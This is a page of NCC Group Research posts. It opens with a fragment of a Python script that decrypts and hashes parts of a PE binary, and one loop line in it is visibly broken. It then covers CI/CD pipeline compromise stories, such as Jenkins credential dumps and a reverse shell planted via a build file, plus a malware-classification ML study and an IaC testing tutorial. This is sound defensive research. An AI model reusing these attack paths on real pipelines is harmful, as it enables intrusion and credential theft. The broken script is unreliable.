def accumulate_bytes(r, s):
  # TEA Key is 128 bits
  dw6 = 0xF866ED75
  dw7 = 0x31CFE1EF
  dw4 = 0x1955A6A0
  dw5 = 0x9880128B
  key = struct.pack('IIII', dw6, dw7, dw4, dw5)
  # Decipher ranges plaintext
  ranges_blob = pe[pe.virt2off(r[0]):pe.virt2off(r[0])+r[1]]
  ranges = parse_ranges(Tea(key).decrypt(ranges_blob))
  # Decipher skipped offsets plaintext (8bytes long)
  skipped_blob = pe[pe.virt2off(s[0]):pe.virt2off(s[0])+s[1]]
  skipped_decrypted = Tea(key).decrypt(skipped_blob)
  skipped = sorted( \
    [int.from_bytes(skipped_decrypted[i:i+4], byteorder='little', signed=False) \
        for i in range(0, len(skipped_decrypted), 4)][:-2:2] \
  )
  skipped_copy = skipped.copy()
  next_skipped = skipped.pop(0)
  current = 0x0
  for rr in ranges:
    current += rr[0]
    size = rr[1]
    # Get the next 8 bytes to skip
    while size and next_skipped and next_skipped = 0
      yield blob
      current = next_skipped+8
      next_skipped = skipped.pop(0) if skipped else None
    blob = pe[pe.rva2off(current):pe.rva2off(current)+size]
    yield blob
    current += len(blob)
  # Append the initially skipped offsets
  yield b''.join(pe[pe.rva2off(rva):pe.rva2off(rva)+0x8] for rva in skipped_copy)
  return

def main():
  global pe
  hashvalue = hashlib.sha1()
  hashvalue.update(b'\x7B\x0A\x97\x43')
  with open(argv[1], "rb") as f:
    pe = PE(f.read())
  accumulator = accumulate_bytes((0x140A85B51, 0xFCBCF), (0x1409D7731, 0x12EC8))
  # Get all hashed bytes
  for blob in accumulator:
    hashvalue.update(blob)
  print(f'SHA1 FINAL: {hashvalue.hexdigest()}')
  return

Disclaimer

None of the samples used in this publication were part of an NCC Group engagement. They were selected from publicly available binaries whose obfuscators exhibited features similar to previously encountered ones.

Due to the nature of this material, specific content had to be redacted, and a number of tools that were created as part of this effort could not be shared publicly.

Despite these limitations, the author hopes the technical content shared here is sufficient to provide the reader with a stimulating read.

References

Related Content

✇NCC Group Research

10 real-world stories of how we’ve compromised CI/CD pipelines

By: Aaron Haymore

by Aaron Haymore, Iain Smart, Viktor Gazdag, Divya Natesan, and Jennifer Fernick

Mainstream appreciation for cyberattacks targeting continuous integration and continuous delivery/continuous deployment (CI/CD) pipelines has been gaining momentum. Attackers and defenders increasingly understand that build pipelines are highly-privileged targets with a substantial attack surface.

But what are the potential weak points in a CI/CD pipeline? What does this type of attack look like in practice? NCC Group has found many attack paths through different security assessments that could have led to a compromised CI/CD pipeline in enterprises large and small.

In this post, we will share some of our war stories about what we have observed and been able to demonstrate on CI/CD pipeline security assessments, clearly showing why there is the saying, “they are execution engines.”

Through showing many different flavors of attack on possible development pipelines, we hope to emphasize the criticality of securing this varied attack surface to better secure the software supply chain.

Jenkins with multiple attack angles

The first 3 attack stories are related to Jenkins, a leading tool in CI/CD used by many companies and one of our consultants came across when working on multiple assessments for major software companies. 

Attack #1: “It Always Starts with an S3 Bucket…”

The usual small misconfiguration in an S3 bucket led to a full DevOps environment compromise. The initial attack angle was via a web application. The attack flow for this compromise involved:

Web application -> Directory listing on S3 bucket -> Hardcoded Git credential in script file -> Git access -> Access Jenkins with the same hardcoded Git credential -> Dump credentials  from Jenkins -> Lateral movement -> Game Over -> Incident -> Internal Investigation

NCC Group performed a black box web application assessment with anonymous access on an Internet-facing web application. At the beginning of the test, a sitemap file was discovered in a sitemap folder. The sitemap folder turned out to be an S3 bucket with directory listing enabled. Looking through the files in the S3 bucket, a bash shell script was spotted. After a closer inspection, a hardcoded git command with a credential was revealed. The credentials gave the NCC Group consultant access as a limited user to the Jenkins Master web login UI which was only accessible internally and not from the Internet. After a couple of clicks and looking around in the cluster they were able to switch to an administrator account. With administrator privileges, the consultant used Groovy one-liners in the script console and dumped around 200 different credentials such as AWS Access token, SAST/DAST tokens, EC2 SSH certificates, Jenkins users, and other Jenkins credentials. The assessment ended with the client conducting incident response working closely with the consultant for remediation. 

NCC gave a detailed report with remediation and hardening steps for the client, and some of the recommended steps were the following:

  • Remove directory listing for S3
  • Remove shell script file and hardcoded credential
  • Remove the connection that allows whoever has GitHub access can access Jenkins
  • Install and review Audit Trail and Job Configuration History plugins
  • Jenkins should not be accessible from the Internet in this case we tested onsite
  • Change and lower the privileges the Jenkins account had
  • Deploy and use MFA for administrator accounts

Attack #2: Privilege Escalation in Hardened Environment

The following steps describe another privilege escalation path found by the consultant on a different assessment:

Login with SSO credentials -> Testing separated, lock down and documented roles -> One role with Build/Replay code execution -> Credentials dump

The assessment was to review a newly implemented hardened Jenkins environment with the documented user roles that had been created using the least privileges principle. Jenkins was running under a non root-user, latest version of core and plugins, had SSL certification and SSO with MFA for login. NCC Group consultant had access to one user with a specific role per day and tested if there was any privilege escalation path.

The builder role had the Build/Replay permission as well (that allows replaying a Pipeline build with a modified script Or with additional Groovy code), not just the build permission to build the jobs. This allowed NCC Group consultants to run Groovy code and dump credentials of Jenkins users and other secrets.

Attack #3: Confusing Wording in a Plugin

The last angle was a confusing option in a Jenkins plugin that led to wide-open access:

GitHub Authorization -> Authenticated Git User with Read Access -> Jenkins Access with Gmail Account

The GitHub OAuth Plugin was deployed in Jenkins that provided authentication and authorization. The “Grant READ permissions to all Authenticated Users” and “Use GitHub repository permissions” options were ticked that allowed anyone with a GitHub account (even external users) accessing the Jenkins web login UI. NCC was able to register and use their own hosted email account to get access to their projects.

GitLab CI/CD Pipeline Attacks

NCC Group has done many jobs that have looked at another well-known and used tool called GitLab. As a result, the NCC Group consultant has found some interesting attack paths.

Attack #4: Take Advantage of Protected Branches

On one particular job, there were multiple major flaws in how the GitLab Runners were set up. The first major flaw was that the runners were using privileged containers, which means they were configured to use the “—privileged” flag that would allow them to spin up other privileged containers that could trivially escape to the host. This one was a pretty straightforward attack vector and could get you to the host. But what made this one interesting was these GitLab Runners were also shared Runners and not isolated. One developer who was only supposed to push code to a certain repository could also get access to secrets and highly privileged repositories. In addition, these shared runners were using trivial environment variables that stored highly sensitive secrets, such as auth tokens and passwords. A user who had limited push access to a repository could be able to get highly privileged secrets.

Protected branches are branches that can be maintained by someone with a maintainer role within GitLab and they can say “only these people can push against these source code repositories or branches” and there is a change request (CR) chain associated with it. These protected branches can be associated with a protected runner. You can lock it down, so the developer has to get the CR approved to push code. But in this case, there was no CR and protected branch implemented and enforced. Anybody could push to an unprotected branch and then chain the previous exploits. Chaining of these 4-5 vulnerabilities gave all access.

There were lots of different paths as well. Even if the “—privileged” flag was used, there was also another path to get to the privileged containers. There was a requirement for the developers to be able to run the docker command. The host’s docker daemon was shared with the GitLab Shared Runner. That led to access to the host and jumping between containers.

The Consultant asked the client to understand and to help remediate the issues, but was keen to understand root causes for what led to these choices being made. Why did they make these configuration choices, and what trade-offs did they consider? What were the more-secure alternatives to these choices; were they aware of these options, and if so, why weren’t they chosen?

The reason that the company wanted privileged containers was to do static analysis on the code that was being pushed. Consultants explained that they should have isolated Runners and not use the shared Runners, and should have further limited access control. This emphasized an important point: It is possible to run privileged containers and to still somewhat limit the amount of sensitive information exposed.

Many of GitLab’s CI/CD security mechanisms to execute jobs depend on the premise that protected branches only contain trusted build jobs and content as administrated by Project’s Maintainers. Users at a Project’s Maintainer Privilege Level or above have the ability to deputize other users to be able to manage and push to specific protected branches as well. These privileged users are the gateway representing what is and is not considered trusted within the project. Making this distinction is important to reduce the exposure of privileges to untrusted build jobs.

Attack #5: GitLab Runners Using Privileged Containers

On another job, GitLab Runners were configured to execute CI/CD jobs with Docker’s “—privileged” flag. This flag negates any security isolation provided by Docker to protect the host from potentially unsafe containers. By disabling these security features, the container process was free to escalate their privileges to root on the host through a variety of features. Some tools were packaged as Docker images, and to support this, the client used Docker in Docker (DIND) within a privileged container to execute nested Containers.

If privileged CI/CD jobs are necessary, then the corresponding Runners should be configured to only execute on protected branches of projects which are known to be legitimate. This will prevent arbitrary developers from submitting unreviewed scripts which can result in host compromise. The Maintainer Role’s ability to manage protected branches for projects means they regulate control over any privileges supplied by an associated protected Runner.

Attack #6: Highly Privileged Shared Runners could claim jobs associated with sensitive Environment Variables and Privileged Kubernetes Environments.

Privileged Runners should not be configured as Shared Runners or broadly scoped groups. Instead, they should be configured as needed for specific projects or groups which are considered to have equivalent privilege levels among users at the maintainer level and above.

Attack #7: Runners Exposed Secrets to Untrusted CI/CD Jobs

Runners make calls to API endpoints which are authenticated using various tokens and passwords. Because these were Shared Runners, authentication tokens and passwords were accessed trivially by any user with rights to commit source code to Gitlab. Runners were configured to expose the secrets through environment variables. Secrets management, especially in CI/CD pipelines is a tough issue to solve.

To mitigate these types of risks, ensure that environment variables configured by Runners in all build jobs do not hold any privileged credentials. Properly-scoped GitLab variables can be used as a replacement. Environment variables should only hold informational configuration values which should be considered accessible to any developer in their associated projects and groups.

If Runners must provide credentials to their jobs through environment variables or mounted volumes, then the Runners should limit the workloads to which they are exposed. To do so, such Runners should only be associated with the most specific possible project/group. Additionally, they ought to be marked as “protected” so that they can only process jobs on protected branches.

Attack #8: Host Docker Daemon Exposed to Shared GitLab Runner

On one job, the Gitlab Shared Runners mount the Host’s Docker socket to CI/CD job containers at runtime. While this allows legitimate developers to run arbitrary Docker commands on the host for build purposes, it also allows build jobs to deploy privileged containers on the host itself to escape their containment. This also provides attackers with a window through which they can compromise other build jobs running on the host. Essentially, this negates all separation provided by Docker preventing the contained process from accessing other containers and the host. The following remediations are recommended in this case:

  • Do not allow developers to directly interact with Docker daemons on hosts they do not control. Consider running Docker build jobs using a tool that supports rootless Docker building such as kaniko.
  • Alternatively, develop a process that runs a static set of Docker commands on source code repositories to build them. This process should not be performed within the CI/CD job itself as job scripts are user-defined and the commands can be overwritten.
  • If this must be implemented through a CI/CD job, then build jobs executed on these Runners should be considered privileged and as such should be restricted Docker Runners accepting commits made to protected and known safe repositories to ensure that any user-defined CI/CD jobs have gone through a formal approval process.

Kubernetes

Pods that are running a certain functionality sometimes end up using different pod authentication mechanisms that reach out to various services, AWS credentials are one example. Many times people use plugins and don’t restrict API paths around the plugins. For example, Kube2IAM is a plugin that is seen often and if you don’t correctly configure it from a pod you can get privileged containers that can lead to privileged API credentials that can let you see what the underlying host is doing.

Attack #9: Kube2IAM

Kube2IAM works off of pod annotations. It intercepts calls from a container pod being made to the AWS API (169254). An NCC Group consultant found an interesting situation where every developer could annotate pods. There was a setting configured with the “sts assume-role *” line in the AWS role that Kube2IAM was using. That allowed any developer who could create/annotate a pod inherits the AWS role of admin. This meant that anyone who could create any pod and specify an annotation could get admin privileges on the main AWS tooling account for a bank. This account had VPC peering configured that could look into any pod and non-pod environments. You could get anywhere with that access. Here is a pipeline that builds a pod, and all an attacker would have to do is add in an annotation to that which outputs something at the end.

There was another similar job performed by an NCC Group consultant. In this scenario, they could not annotate pods – instead, in Kube2IAM there is the flag “whitelist route regex” and you can mention AWS API paths. So you can specify what routes you want to go to/not go to. The DevOps admins had configured that with a white character that would allow someone to get access to privileged paths that would lead to underlying node credentials.

Attack #10: The Power of a Developer Laptop

In our final scenario, the NCC Group consultant got booked on a scenario-based assessment:

“Pretend you have compromised a developer’s laptop.”

All that the consultant could do was commit code to a single Java library that was using the Maven project. They set one of the pre-requirement files to an arbitrary file that would give a shell from the build environment. They changed it to a reverse Meterpreter shell payload. They found that the pod had an SSH key lying on disk that went to the Jenkins master node and then dumped all the variables from Jenkins. They then discovered that this was a real deployment pipeline that had write permissions and cluster-admin into the Kubernetes workload. Consequently, they now had access to the full production environment.

There was another job where NCC Group consultant compromised one user account and had access to a pipeline that was authenticated to the developer group. Running custom code was not possible in the pipeline, but they could tell the pipeline to build off a different branch even if it did not exist. The pipeline crashed and dumped out environment variables. One of the environment variables was a Windows domain administrator account. The blue team saw the pipeline crash but did not investigate.

In our final story, NCC Group consultants were on an assessment in which they landed in the middle of the pipeline. They were able to port scan the infrastructure that turned out to be a build pipeline. They found a number of applications with (as of then) unknown functionality. One of the applications was vulnerable to server-side request forgery (SSRF)  and they were running on AWS EC2 instances. The AWS nodes had the ability to edit config maps that allow mapping between an AWS user account and a role inside the cluster. It turned out that this didn’t check if the cluster and the account are in the same user account. As a result, the consultants were able to specify another AWS account to control the clusters and had admin privileges on the Elastic Kubernetes Service cluster (EKS).

Summary

CI/CD pipelines are complex environments. This complexity requires methodical & comprehensive reviews to secure the entire stack. Often a company may lack the time, specialist security knowledge, and people needed to secure their CI/CD pipeline(s).

Fundamentally, a CI/CD pipeline is remote code execution, and must be configured properly.

As seen from above, most compromise has the following root causes or can be traced back to:

  • Default configurations
  • Over permissive permissions and roles
  • Lack of security controls
  • Lack of segmentation and segregation

✇NCC Group Research

Machine Learning for Static Analysis of Malware – Expansion of Research Scope

By: Matt Lewis

Introduction

The work presented in this blog post is that of Ewan Alexander Miles (former UCL MSci student) and explores the expansion of scope for using machine learning models on PE (portable executable) header files to identify and classify malware. It is built on work previously presented by NCC Group, in conjunction with UCL’S Centre for Doctoral Training in Data Intensive Science (CDT DIS), which tackles a binary classification problem for separating malware from benignware [1]. It explored different avenues of data assessment to approach the problem, one of which was observations on PE headers.

Multiple models were compared in [1] for their performance in accurately identifying malware from a testing dataset. A boosted decision tree (BDT) classifier, using the library XGBoost, was found to be most performant, showing a classification accuracy of 98.9%. The PE headers of files, both malicious and benign, were pre-processed into inputs made available to the BDT; following this, the model’s hyperparameters were tuned to improve model accuracy. This same methodology was applied to other models and the results compared, also using the model precision, recall and area under the ROC curve for assessment.

Here, a ‘deep dive’ is conducted on the XGBoost BDT to assess certain features of its training method, along with the robustness and structure of its input datasets. Broken down into four key aspects, this entails studying:

  • Whether the model receives enough training statistics, or whether there is room for improvement when a larger dataset is used for training;
  • The importance of different PE header features in the model’s training;
  • Model performance with various sampling balances applied to the dataset (e.g. weighted heavily with malware);
  • Model robustness when trained on data originating from older or newer files (e.g. training with files from 2010, testing on files from 2018).

These all help to develop an understanding of the model’s ‘black box’ process and present opportunities for model improvement, or its adaptation to different problems. Model accuracy, precision, recall, training time and area under the ROC curve are used in its assessment, with explanations given as to the real outputs they present.

What are PE Headers?

PE stands for portable executable – these are files with extensions such as .exe, .dll and .sys. It is a common format for many programs on the Windows OS; in fact, most executable code on Windows is loaded in PE format, whether it be benign or malicious. In general, PEs encapsulate the information necessary for Windows to manage the executable code.

The PE structure is comprised of a Header and a Section; the image below gives a full exploration of a PE:

PE Structure

In this analysis, only the header is of interest. It contains different fields of metadata that give an idea of what the entire file looks like. A couple of examples include ‘NumberOfSections’, which is self-explanatory, and the ‘TimeDateStamp’ which is supposed to reference the time of file creation using an ISO Datestring. The latter is used later as a critical element of this investigation.

PE Headers are commonly used in malware analysis [2] [3]. From a machine learning perspective, these PE Header fields can be extracted to form a dataset for model training. These fields form feature inputs for a model that can go on to perform binary classification – in this case, classifying the file as benignware or malware.

With malware sourced from popular file sharing website VirusShare, alongside benign files extracted from Windows OS programs, such as Windows Server 2000, Windows Package Manager and Windows 10 itself, the PE Header dataset was built. After performing a train-test split, the training dataset comprised of 50564 files, with an approximate balance of 44% malware to 56% benignware. Likewise, the test dataset comprised of 11068 files, with an approximate balance of 69% malware to 31% benignware.  A total of 268 input features were used in the dataset, all extracted from the PE headers, with an encoded one-hot labelled ‘IsMalware’ used for prediction.

Precision vs. Recall vs. Accuracy

Before discussing XGBoost’s training and performance on this data, it is worth understanding what each model output represents in terms of what needs to be achieved. The assumed goal here is to be able to correctly identify malware from a set of unlabelled files consisting of both malware and benignware. People familiar to the machine learning process will know about confusion matrices, which can be used to graphically represent binary classification outcomes. A typical binary classification confusion matrix will look like this:

Binary classification confusion matrix

This matrix shows four outcomes side-by-side. True positives, where the model classifies malware as malware, are on the bottom right. True negatives, likewise, are on the top left, and represent the model classifying benignware as benignware. The objective of model improvement can be to reduce the other two outcomes – false negatives, where the model classifies malware as benign (bottom left) and false positive, where the model classifies benignware as malicious (top right). It is intuitive that the preferred outcome is reducing false negatives, where malware is classified as benign.

As such, multiple assessment metrics are used. Precision measures the number of true positives out of the total number of positives:

Thus, here, precision can be thought of as a measure of how many files are correctly labelled as malware out of all the files that are labelled malware. In an ideal world this is 100% – all the files labelled as malware are indeed malware.

What this doesn’t take into consideration is that the number of files labelled as malware might not be equal to the total number of malware files in the dataset! For example, if there are 100 malware and 100 benign files in the dataset and 60 are predicted to be malware, and these 60 are all actually malware, the model outputs 100% precision. However, in this case, it missed 40 malware files. Precision can therefore also be a measure of how much false positives have been reduced – high precision means a low false positive rate.

Recall is in some ways the opposite here, measuring the number of true positives out of the total number of malware files:

So recall is essentially the percentage of malware files labelled correctly. On the other hand, what this doesn’t account for is the false positive rate. Assume there are again 100 malware and 100 benign files in the dataset and 120 are predicted to be malware. These 120 files cover all 100 malware files and 20 benign files. As all malware files are correctly labelled, the model recall is 100%, but it doesn’t register the fact that 20 benign files have been incorrectly labelled as malware. Recall can therefore also be a measure of how much false negatives have been reduced – high recall means a low false negative rate.

Accuracy is less relevant as it doesn’t reflect the dataset’s balance:

Essentially it answers, ‘how often is the prediction correct?’. Now assume a dataset of 10 benign files and 90 malware files. Predicting they are all malware gives an accuracy of 90%, which is very misleading because it completely disregards the benign files.

Knowing what these represent and co-ordinating that with the overall goal is important. If the main goal is to correctly label all malware, it could be assumed that it is acceptable (with a high enough precision) to incorrectly label benignware as malware rather than the other way around. This is a ‘better safe than sorry’ approach, where more research can be done on the false positives afterward. In this circumstance, a higher recall is favoured, reducing the number of malware files falsely labelled as benignware – the false negatives.

Training Statistics

After first training a model and receiving the initial results, something worth investigating almost immediately is the dataset size. Are there enough training statistics for the model to output the best possible results, or might the model benefit from more data to train on?

This can be examined by varying the number of training statistics fed to the model, while keeping the test dataset the same. As the model is fed more and more data in each successive training, its performance is assessed. If a plateau is seen, then that means feeding the model a larger training dataset may be making no difference.

The XGBoost already established in [1], using an even larger dataset than that described above, output the following performance:

Metric Result (fraction, not %)
Accuracy 0.978
Recall 0.980
Precision 0.970

The first objective was to show that the model could be as performant with the newer, slightly smaller dataset. Following this, the dataset was randomly under-sampled to continuously smaller sizes, with the model performance evaluated at each point. Specifically, the dataset was reduced to 0.1% of its original size, with this incremented by 0.1% intervals until it was 1% of the original size. Following this, it was increased to 2% of its original size, and incremented in 2% intervals until eventually 100% of the dataset was trained on. The results are shown below:

Accuracy

Here, the metric accuracy is used, as it is sufficient to give a blanket idea of model performance. A plateau begins to form when only 20% of the training statistics are used, and it is certain that by a dataset size of 50%, very little increase in performance is achieved by using more data. Remember that only the training dataset is reduced in size, with the model testing on the full 11068 files at each stage.

This confirmed that the model was being fed more than enough training statistics and that, in fact, there was room for training time improvement by reducing the dataset size while bearing only a very small reduction in performance. It also set a baseline that for future analyses, at least 20% of the data should be used when downsampling, to avoid bias in the results from lack of training statistics.

There is still room for improvement on these findings: all metrics (precision, recall) should be examined in future. Furthermore, the dataset could be proportionately sampled to maintain the malware/benign balance, or alternatively different balances should be applied in conjunction with the downsampling.

Feature Importance

To this point, the training dataset comprised of files with 268 input features, all extracted from the PE headers. The next aspect of the training worth testing was whether all of these features were necessary to produce a high-performing model, and what effect removing some of them would have on the training.

A ‘recursive drop’ method was used to implement these tests. The model was trained using all 268 input features, then each input feature was ranked using a function provided by the scikit-learn library, called feature_importances_. It ranks the input features by ‘the mean and standard deviation of accumulation of the impurity decrease within each tree’; more information can be found on it by reading the documentation [4].

Following this, the two least important features were dropped from the dataset and training was conducted using the set now comprised of 266 features. All features were kept in the testing dataset. This was repeated, reducing the number of features by 2 each time, until only 2 features are trained on. The model was evaluated each time a new set of features was implemented. The precision, recall and accuracy all presented similar results:

Precision, Recall and Accuracy

The above show that an alarmingly small number of features can be used in model training to still achieve essentially the same performance, with about 30 input features appearing almost as performant. The feature names were registered at each stage of the recursive drop; as such, the 30 most relevant input features are known to be (ordered left-to-right, moving down):

Magic MajorLinkerVersion MinorLinkerVersion
SizeOfUninitializedData ImageBase FileAlignment
MajorOperatingSystemVersion MajorImageVersion MinorImageVersion
MajorSubsystemVersion SizeOfImage SizeOfHeaders
CheckSum SubSystem DllCharacteristics
SizeOfStackReserve SizeOfHeapReserve NumberOfSections
e_cblp e_lfanew SizeOfRawData0
Characteristics0 Characteristics1 Misc2
Characteristics2 Misc3 Characteristics3
Characteristics4 Characteristics5 BaseOfData

A conclusion to be drawn from these evaluations is that these features from the PE header files exhibit the most significant differences between malicious and benign files. However, further research should be conducted into these header features individually, or alternatively the same recursive drop method should be investigated with random features dropped each time.

A more interesting observation drawn from this was the effect on model training time, which may uncover a little about the nature of XGBoost’s black box functions:

Effect on model training time

It is visible that the training time using XGBoost decreases in an almost perfectly linear fashion with a reduction of input features. This indicates a strong element of XGBoost’s learning process comes from its looping over input variables, with less time spent looping over fewer inputs. Further investigation here, possibly studying how XGBoost responds to random numbers of inputs and its training time proportionality, is necessary.

Another method of evaluating a model’s performance is the receiver operating characteristic (ROC) curve, which presents the true positive rate as a function of the false positive rate. As the area under an ROC curve tends toward 1, the model is said to be performing better, as it can achieve a very high true positive rate for a very small false positive rate.

A direct comparison of the model using all 268 features with the model using only the 30 above can be made by plotting both ROC curves, which is shown below:

ROC Curve Model Comparison

It is clear there is very little difference to be seen between the original (268 feature) XGBoost and the simplified (30 feature) XGBoost. This suggests a massive reduction in training time for very little performance decay.

Dataset Balancing

Machine learning models are known to prioritise identification of different classes when the training dataset is balanced differently [5]. To identify any bias present in the model’s performance, the balance of the dataset was also evaluated. As this was a binary classification problem, achieving a specific dataset balance could be achieved by simply downsampling either the malware or the benignware in the test dataset.

To achieve the desired balance in the dataset, either class was downsampled according to the following equations:  

Where M and B are the raw numbers of the malware and benign samples respectively, and RM is the ‘malware ratio’, given by:

The constraint was also placed that the dataset could not be sampled down to lower than 20% of its original size, as this would re-introduce bias due to lack of training statistics.

Model precision and recall were evaluated after training on increasing amounts of malware present in the dataset; beginning at a balance of 10% malware/90% benignware, the balance of malware was increased in 5% intervals (with the model evaluated each time) up to a dataset formed of 100% malware. The results are below:

Model Precision & Recall

No balance was applied to the test dataset. The graphs above support the conclusion that recall improves in favour of high malware content, meaning the model learns more about how to identify malware from a high balance of it. On the opposing side, the model learns more about how to identify benignware when there is a high balance of benign in the dataset, leading to high precision at low malware content.

The most important conclusion to draw is that this can be used as a tool. By applying specific balances to the training dataset (maintaining enough statistics notwithstanding), a model can be specifically tailored to precision or recall. Again, this will be dependent on the overall goal; a suggestion of this study would be high amounts of malware contributing to a higher recall.

Time Testing

The final aspect of study for this investigation was the effect of selecting training files from a specific time period, to test on newer data. This attempts to yield an understanding of the model’s robustness with time – if it is trained on older data but tested on newer data, is it just as performant? If not, how quickly does it become obsolete, and how often will these models need to be updated and maintained?

The main caveat to the methodology here is that files were selected based on their ‘TimeDateStamp’ header, which should indicate the creation time of the file. This presented two issues:

  • This input feature can be modified, falsified, or corrupted
  • This input feature can accidentally default to the incorrect datetime

Files dated to the Windows 7 release were a common occurrence, although it is expected some portion of them are incorrect; this was noted in [1]. As such, there is certainly an avenue for improvement on this section for future analyses.

Continuing with this method, further cuts were made in an attempt to improve the dataset. Files dated to years previous to 2000 were removed, as many had suspicious stamps (e.g. dated to epoch, 1 Jan 1970 0x0) and in total they made up a very small fraction of the files. Following this, a split was made such that test files were dated between 2019-2021, and training files began between 2000-2010.

Following this, an ‘expanding window’ method was used. Initially, the model was trained on files from between 2000-2010, tested on files from 2019-2021, and evaluated. Following this, the training set expanded to 2000-2011, and so on until the full training dataset reached years spanning 2000-2018. Note, the test dataset never changed, and no specific balance was applied to either dataset. The results are below:

Recall & Precision

Firstly, note the y-axis on the precision graph – the precision changes nowhere near as much as the recall, where we see around an average of 5% decline in performance per year. The likely reason that the precision changes is the introduction of more malware in the later dated files. What this does unfortunately indicate is that the model will not remain effective for very long; it may need maintaining and updating on new data every year to stay relevant.

Conclusion

The findings above can help contribute to building a more refined model for a specific purpose when it comes to malware identification via PE Headers. Overall, a better understanding of XGBoost’s ability in this domain has been presented, with a slightly deeper dive into what can improve the model’s performance even further.

Although it has been established that a full 60000 strong dataset is not fully necessary, it always makes more sense to feed models as much data as possible. However, the knowledge of how dataset balancing affects precision and recall allows the user to shift model performance in line with their goals. Furthermore, they can vastly reduce training time by simply including the 30 input features listed above.

Further investigation should be made into the feature breakdown, with examination as to why the 30 features listed provide just as much performance, or whether it is even those features specifically and not just a set of 30 random features. Data balancing should also be considered for the time testing, and it may be worth finding a few more training statistics from 2000 onward to further remove any biases from lack of training statistics.

Acknowledgements

Firstly, I would like to thank the whole NCC group for providing the opportunity to tackle this project. In conjunction I would like to thank UCL’s Centre for Doctoral Training in Data Intensive Science for selecting me for the placement. From it I take away invaluable experience using different new technologies, such as AWS’ EC2 instances and VMs, getting to grips with ML via CLI and generally expanding my skills in model evaluation. Explicit thanks go to Tim Scanlon, Matt Lewis and Emily Lewis for help at different phases of the project!

Written by Ewan Alexander Miles.

References

[1] E. Lewis, T. Mlinarevic, A. Wilkinson, Machine Learning for Static Malware Analysis. 10 May 2021. UCL, UK.

[2] E. Raff, J. Sylvester, C. Nicholas, Learning the PE Header, Malware Detection with Minimal Domain Knowledge. 3 Nov 2017. New York, NY, USA.

[3] Y. Liao, PE-Header-Based Malware Study and Detection. 2012. University of Georgia, Athens, GA.

[4] Scikit-learn. Feature importance with a forest of trees. Accessed 6 Dec 2021.

[5] M. Stewart. Guide to Classification on Imbalanced Datasets. 20 Jul 2020. Towards Data Science.

✇NCC Group Research

Testing Infrastructure-as-Code Using Dynamic Tooling

By: Erik Steringer

Erik Steringer, NCC Group

Overview

TL;DR: Go check out https://github.com/ncc-erik-steringer/Aerides

As public cloud service consumption has grown, engineering and security professionals have responded with different tools and techniques to achieve security in the cloud. As a consultancy, we at NCC Group have published multiple tools that we use to guide testing and identify risks for our clients.

In recent years, these cloud providers as well as other companies have also provided infrastructure-as-code (IaC) solutions to manage infrastructure and set up environments. IaC allows cloud customers to write code that represents the infrastructure they want to deploy with a cloud provider. Rather than depend on a cloud engineer to create infrastructure without documentation, piece-by-piece, IaC allows engineers to produce reusable code. This centralizes the process of building and deploying infrastructure and prevents entire classes of risks.

One key benefit of IaC is the ability to perform analysis of the code to identify risks in the infrastructure before the infrastructure is deployed. For example, if an engineer writes code that creates an Amazon S3 bucket with a bucket policy, it is possible to pull the contents of the bucket policy and then look for risks such as making the bucket world-readable.

Static Tools

Much like in the Application Security space, we can classify Cloud Security tools as either static or dynamic. Static tools interpret and analyze code, rather than pulling data from a cloud provider. Static tools easily integrate with practices such as continuous integration and continuous deployment. Engineers can write security or policy-as-code checks that run each time someone commits changes. This can prevent high-severity misconfiguration issues from affecting deployed infrastructure.

Figure 1 - Static Analysis Methodology
Figure 1 – Static Analysis Methodology

Dynamic Tools

Dynamic tools such as ScoutSuite, interact with a cloud provider to pull data, then interpret and analyze that data to identify risks. This means catching risks in the current state of the infrastructure, rather than the intended design and desired state. Engineers can write security and policy-as-code checks that run periodically or after deployments.  Dynamic tools, as they currently stand, cannot identify risks before deployments. But they can find risks that static tools cannot identify such as risks created from resource configuration drift, or independent deployments of IaC to a common account/subscription/project of a cloud provider.

The Best of Both Worlds?

Beyond the universal limitations, cloud security tools that identify risks deeper than misconfigurations (graph-based analysis of IAM or network access controls such as with PMapper1, CloudMapper2, and Cartography3) are dynamic rather than static. This means we miss out on the value these tools bring unless we invest the time to build interpreters for the different ways that people can write infrastructure-as-code.

However, there is a project designed specifically for continuous integration and testing called LocalStack4 that sets up a mock AWS API endpoint. By using LocalStack, it is possible to take dynamic tools and use them like static tools by pointing them at the emulated AWS API. It should also be possible to take test cases from normal dynamic testing and port them to the IaC testing.

Figure 2 - Dynamic Analysis Methodology
Figure 2 – Dynamic Analysis Methodology

Demonstration

Today, we are releasing a project called Aerides. This project demonstrates how to integrate LocalStack and dynamic tools for assessing IaC. Aerides includes mock infrastructure for a web service that is written using Terraform’s HCL. It is hosted on GitHub and uses GitHub Actions to perform automatic tests for pull requests.

Clone the repository ( https://github.com/ncc-erik-steringer/Aerides ) onto your machine and install its dependencies. Navigate into the Aerides/infracode directory and run:

# this will take ~30s to spin up
localstack start -d 

terraform init

terraform apply -var "acctid=000000000000"

This will launch LocalStack (daemon mode) and deploy the Terraform code. Now it is possible to run commands and see the mock infrastructure. For example:

# set fake access keys, set default region to us-east-1
aws configure --profile localstack 
aws iam list-users \
--profile localstack \
--endpoint-url hxxp://localhost:4566 \

Run PMapper against LocalStack like so:

pmapper --profile localstack graph create \
--localstack-endpoint hxxp://localhost:4566 \
--exclude-services autoscaling

# should output 000000000000.svg if graphviz is installed
pmapper --account 000000000000 visualize 
Figure 3 – PMapper Visualization of Infra-as-Code
Figure 3 – PMapper Visualization of Infra-as-Code

In the repository, there are currently four pull requests that demonstrate different types of risks that can be detected before deployment. The GitHub Actions that run the tests are hosted in the same repository. The test cases are written with Python’s `unittest` framework and show how you can programmatically handle the data generated by these tools.

How to Build Continuous Integration with LocalStack

Although the noted repository is using GitHub with GitHub Actions, it is possible to use the same technique with other CI solutions. To generalize the process:

  1. Download the repository source
  2. Install dependencies including Terraform and LocalStack, as well as any other dynamic tools to use for testing (note, with solutions that support this option, it might be wise to create an image that has these dependencies installed and ready to go rather than install them every time you execute this process)
  3. Initialize LocalStack and allow it to run in the background throughout the remainder of the process (`-d` parameter)
  4. Initialize Terraform
  5. Use Terraform to apply the IaC to the running instance of LocalStack
  6. (Depending on the dynamic tools used) Initialize mitmproxy and allow it to run in the background throughout the remainder of the process
  7. Run dynamic tools to gather data from LocalStack, using the proxy when necessary
  8. Run test cases against the data gathered from the dynamic tools (see the testcode folder)
Figure 4 – The general CI processes for this technique
Figure 4 – The general CI processes for this technique

Advantages and Disadvantages

